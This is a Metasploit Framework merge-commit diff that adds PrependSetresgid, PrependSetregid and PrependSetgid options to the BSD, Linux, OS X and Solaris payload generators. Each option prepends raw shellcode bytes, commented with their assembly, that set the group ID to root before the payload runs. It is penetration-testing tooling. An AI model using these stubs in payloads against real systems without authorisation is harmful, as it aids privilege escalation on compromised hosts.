Merge branch 'prependsetguid' of https://github.com/mephos/metasploit-framework into mephos-prependsetguid

jvazquez-r7 · jvazquez-r7 · commit 205dc8870a0c · 2012-10-19T10:33:56.000+02:00
diff --git a/lib/msf/core/payload/bsd.rb b/lib/msf/core/payload/bsd.rb
@@ -40,6 +40,27 @@ def initialize(info = {})
 						"false"
 					]
 				),
+				Msf::OptBool.new('PrependSetresgid',
+					[
+						false,
+						"Prepend a stub that executes the setresgid(0, 0, 0) system call",
+						"false"
+					]
+				),
+				Msf::OptBool.new('PrependSetregid',
+					[
+						false,
+						"Prepend a stub that executes the setregid(0, 0) system call",
+						"false"
+					]
+				),
+				Msf::OptBool.new('PrependSetgid',
+					[
+						false,
+						"Prepend a stub that executes the setgid(0) system call",
+						"false"
+					]
+				),
 				Msf::OptBool.new('AppendExit',
 					[
 						false,
@@ -99,6 +120,35 @@ def generate(*args)
 				       "\xcd\x80"              #   int     $0x80                      #
 			end
 
+			if (datastore['PrependSetresgid'])
+				# setresgid(0, 0, 0)
+				pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x66\xb8\x38\x01"     +#   movw    $0x0138,%ax                #
+				       "\xcd\x80"              #   int     $0x80                      #
+			end
+
+			if (datastore['PrependSetregid'])
+				# setregid(0, 0)
+				pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\xb0\x7f"             +#   movb    $0x7f,%al                  #
+				       "\xcd\x80"              #   int     $0x80                      #
+			end
+
+			if (datastore['PrependSetgid'])
+				# setgid(0)
+				pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\xb0\xb5"             +#   movb    $0xb5,%al                  #
+				       "\xcd\x80"              #   int     $0x80                      #
+			end
 			# Append
 
 			if (datastore['AppendExit'])
diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb
@@ -40,6 +40,27 @@ def initialize(info = {})
 						"false"
 					]
 				),
+				Msf::OptBool.new('PrependSetresgid',
+					[
+						false,
+						"Prepend a stub that executes the setresgid(0, 0, 0) system call",
+						"false"
+					]
+				),
+				Msf::OptBool.new('PrependSetregid',
+					[
+						false,
+						"Prepend a stub that executes the setregid(0, 0) system call",
+						"false"
+					]
+				),
+				Msf::OptBool.new('PrependSetgid',
+					[
+						false,
+						"Prepend a stub that executes the setgid(0) system call",
+						"false"
+					]
+				),
 				Msf::OptBool.new('PrependChrootBreak',
 					[
 						false,
@@ -102,6 +123,31 @@ def generate(*args)
 				       "\xcd\x80"              #   int     $0x80                      #
 			end
 
+			if (datastore['PrependSetresgid'])
+				# setresgid(0, 0, 0)
+				pre << "\x31\xc9"             +#   xorl    %ecx,%ecx                  #
+				       "\x31\xdb"             +#   xorl    %ebx,%ebx                  #
+				       "\xf7\xe3"             +#   mull    %ebx                       #
+				       "\xb0\xaa"             +#   movb    $0xaa,%al                  #
+				       "\xcd\x80"              #   int     $0x80                      #
+			end
+
+			if (datastore['PrependSetregid'])
+				# setregid(0, 0)
+				pre << "\x31\xc9"             +#   xorl    %ecx,%ecx                  #
+				       "\x31\xdb"             +#   xorl    %ebx,%ebx                  #
+				       "\x6a\x47"             +#   pushl   $0x47                      #
+				       "\x58"                 +#   popl    %eax                       #
+				       "\xcd\x80"              #   int     $0x80                      #
+			end
+
+			if (datastore['PrependSetgid'])
+				# setgid(0)
+				pre << "\x31\xdb"             +#   xorl    %ebx,%ebx                  #
+				       "\x6a\x2e"             +#   pushl   $0x2e                      #
+				       "\x58"                 +#   popl    %eax                       #
+				       "\xcd\x80"              #   int     $0x80                      #
+			end
 			if (datastore['PrependChrootBreak'])
 				# setreuid(0, 0)
 				pre << "\x31\xc9"             +#   xorl    %ecx,%ecx                  #
@@ -185,6 +231,33 @@ def generate(*args)
 				       "\x44\xff\xff\x02"      #   sc                                 #
 			end
 
+			if (datastore['PrependSetresgid'])
+				# setresgid(0, 0, 0)
+				pre << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
+				       "\x7c\xa5\x2a\x78"     +#   xor     r5,r5,r5                   #
+				       "\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
+				       "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
+				       "\x38\x1f\xfe\xab"     +#   addi    r0,r31,-341                #
+				       "\x44\xff\xff\x02"      #   sc                                 #
+			end
+
+			if (datastore['PrependSetregid'])
+				# setregid(0, 0)
+				pre << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
+				       "\x7c\x84\x22\x78"     +#   xor     r4,r4,r4                   #
+				       "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
+				       "\x38\x1f\xfe\x48"     +#   addi    r0,r31,-440                #
+				       "\x44\xff\xff\x02"      #   sc                                 #
+			end
+
+			if (datastore['PrependSetgid'])
+				# setgid(0)
+				pre << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
+				       "\x7c\x63\x1a\x78"     +#   xor     r3,r3,r3                   #
+				       "\x38\x1f\xfe\x2f"     +#   addi    r0,r31,-465                #
+				       "\x44\xff\xff\x02"      #   sc                                 #
+			end
+
 			if (datastore['PrependChrootBreak'])
 				# setreuid(0, 0)
 				pre << "\x3b\xe0\x01\xff"     +#   li      r31,511                    #
@@ -235,6 +308,33 @@ def generate(*args)
 				pre << "\x0f\x05"             #    syscall                           #
 			end
 
+			if (datastore['PrependSetresgid'])
+				# setresgid(0, 0, 0)
+				pre << "\x48\x31\xff"         #    xor     rdi,rdi                   #
+				pre << "\x48\x89\xfe"         #    mov     rsi,rdi                   #
+				pre << "\x6a\x77"             #    push    0x77                      #
+				pre << "\x58"                 #    pop     rax                       #
+				pre << "\x0f\x05"             #    syscall                           #
+			end
+
+			if (datastore['PrependSetregid'])
+				# setregid(0, 0)
+				pre << "\x48\x31\xff"         #    xor     rdi,rdi                   #
+				pre << "\x48\x89\xfe"         #    mov     rsi,rdi                   #
+				pre << "\x48\x89\xf2"         #    mov     rdx,rsi                   #
+				pre << "\x6a\x72"             #    push    0x72                      #
+				pre << "\x58"                 #    pop     rax                       #
+				pre << "\x0f\x05"             #    syscall                           #
+			end
+
+			if (datastore['PrependSetgid'])
+				# setgid(0)
+				pre << "\x48\x31\xff"         #    xor     rdi,rdi                   #
+				pre << "\x6a\x6a"             #    push    0x6a                      #
+				pre << "\x58"                 #    pop     rax                       #
+				pre << "\x0f\x05"             #    syscall                           #
+			end
+
 			if (datastore['PrependChrootBreak'])
 
 				# setreuid(0, 0)
@@ -269,7 +369,7 @@ def generate(*args)
 				pre << "\x48\x89\xe7"         #    mov     rdi,rsp                   #
 
 				# loop chdir(..) 69 times
-				# syscall tendo to modify rcx can't use loop...
+				# syscall tend to modify rcx can't use loop...
 				pre << "\x6a\x45"             #    push    0x45                      #
 				pre << "\x5b"                 #    pop     rbx                       #
 				pre << "\x6a\x50"             #    push    0x50                      #
@@ -278,7 +378,7 @@ def generate(*args)
 				pre << "\xfe\xcb"             #    dec     bl                        #
 				pre << "\x75\xf7"             #    jnz     -7                        #
 
-				# chrot (.) (witch should by /)
+				# chroot (.) (which should be /)
 				pre << "\x6a\x2e"             #    push    .  (0x2e)                 #
 				pre << "\x48\x89\xe7"         #    mov     rdi,rsp                   #
 				pre << "\x48\x89\xd0"         #    mov     rax,rdx                   #
diff --git a/lib/msf/core/payload/osx.rb b/lib/msf/core/payload/osx.rb
@@ -40,6 +40,27 @@ def initialize(info = {})
 						"false"
 					]
 				),
+				Msf::OptBool.new('PrependSetresgid',
+					[
+						false,
+						"Prepend a stub that executes the setresgid(0, 0, 0) system call",
+						"false"
+					]
+				),
+				Msf::OptBool.new('PrependSetregid',
+					[
+						false,
+						"Prepend a stub that executes the setregid(0, 0) system call",
+						"false"
+					]
+				),
+				Msf::OptBool.new('PrependSetgid',
+					[
+						false,
+						"Prepend a stub that executes the setgid(0) system call",
+						"false"
+					]
+				),
 				Msf::OptBool.new('AppendExit',
 					[
 						false,
@@ -99,6 +120,35 @@ def generate(*args)
 				       "\xcd\x80"              #   int     $0x80                      #
 			end
 
+			if (datastore['PrependSetresgid'])
+				# setresgid(0, 0, 0)
+				pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x66\xb8\x38\x01"     +#   movw    $0x0138,%ax                #
+				       "\xcd\x80"              #   int     $0x80                      #
+			end
+
+			if (datastore['PrependSetregid'])
+				# setregid(0, 0)
+				pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\xb0\x7f"             +#   movb    $0x7f,%al                  #
+				       "\xcd\x80"              #   int     $0x80                      #
+			end
+
+			if (datastore['PrependSetgid'])
+				# setgid(0)
+				pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\xb0\xb5"             +#   movb    $0xb5,%al                  #
+				       "\xcd\x80"              #   int     $0x80                      #
+			end
 			# Append
 
 			if (datastore['AppendExit'])
diff --git a/lib/msf/core/payload/solaris.rb b/lib/msf/core/payload/solaris.rb
@@ -33,6 +33,20 @@ def initialize(info = {})
 						"false"
 					]
 				),
+				Msf::OptBool.new('PrependSetregid',
+					[
+						false,
+						"Prepend a stub that executes the setregid(0, 0) system call",
+						"false"
+					]
+				),
+				Msf::OptBool.new('PrependSetgid',
+					[
+						false,
+						"Prepend a stub that executes the setgid(0) system call",
+						"false"
+					]
+				),
 				Msf::OptBool.new('AppendExit',
 					[
 						false,
@@ -86,6 +100,22 @@ def generate(*args)
 				       "\xff\xd6"              #   call    *%esi                      #
 			end
 
+			if (datastore['PrependSetregid'])
+				# setregid(0, 0)
+				pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\xb0\xcb"             +#   movb    $0xcb,%al                  #
+				       "\xff\xd6"              #   call    *%esi                      #
+			end
+
+			if (datastore['PrependSetgid'])
+				# setgid(0)
+				pre << "\x31\xc0"             +#   xorl    %eax,%eax                  #
+				       "\x50"                 +#   pushl   %eax                       #
+				       "\xb0\x2e"             +#   movb    $0x2e,%al                  #
+				       "\xff\xd6"              #   call    *%esi                      #
+			end
 			# Append
 
 			if (datastore['AppendExit'])
